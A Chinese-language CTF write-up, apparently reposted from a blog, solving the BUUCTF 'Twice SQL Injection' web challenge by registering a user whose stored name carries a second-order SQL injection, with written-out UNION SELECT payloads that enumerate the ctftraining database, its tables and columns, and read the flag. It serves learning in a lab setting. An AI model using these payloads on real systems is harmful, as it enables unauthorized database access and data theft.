自学内容网 自学内容网

53,【3】BUUCTF WEB october 2019 Twice SQLinjection

053fd844613648269cfa92c345617a03.jpeg

题目得到信息,2次注入,进入靶场

1bed2ba1ddbe49d48660e961cc1cecf1.png

登录页面,很自然想到SQL

9bf36d4e95f049eaad9ddc4d626fb53a.png

6cb732ce6b5a400692937fe0e3329448.png

第一次注入应该是这个可以登录,注册,提交简介的页面

第二次注入应该是在info处注入,信息显示在简介处

 

我真的纯脑子有病,人家二次注入不是注入两次,是一次注入通过两次操作实现,如下所示

 

c7c188d6ea86469b95af8fbe0b1706d6.png

 

dacb5d487f4c4ca59446295880cbef99.png

被转义了

不过恶意语句输两次就可以了

 

75e48ae2e25b4e939ecce560119cca79.png

e6c51c0fffd140c7a6f5a3670cdbdcc7.png

911cc4aa612a4b1e8497f96b8d64e800.png

database()库名ctftraining

a17496f4f5be41d7884cb3419eefbd41.png

e71189ea94ac4b509d994ac573ceccd1.png

e68207bddb3e41a589fd7fd122024f1d.png

1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'#

表名flag,news,users

e22a6824ff9743daa567547f3bc19304.png

3917e7312c964c7592177bc45351c6ce.png

1' union select group_concat(column_name) from information_schema.columns where table_name='flag'#

字段名flag

1' union select group_concat(flag) from ctftraining.flag#

4505ec8628a448fb8c8572a0f3e5e5f1.png

????注册失败????

修改修改

1' union select flag from ctftraining.flag#

985368fbf1c64b06ab857944b3684cfb.png

??????最后一步不显示flag

再修改修改

1' union select flag from flag#

c8d520751d63446db92a3e801d030780.png

这句就对了

得到flag

 

笔记

1,SQL注入还有2次注入的类型

2,爆出信息的语句需要多次修改

3,看到陌生词语先搜搜,不能想当然

 

 


原文地址:https://blog.csdn.net/2402_87039650/article/details/145208429

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!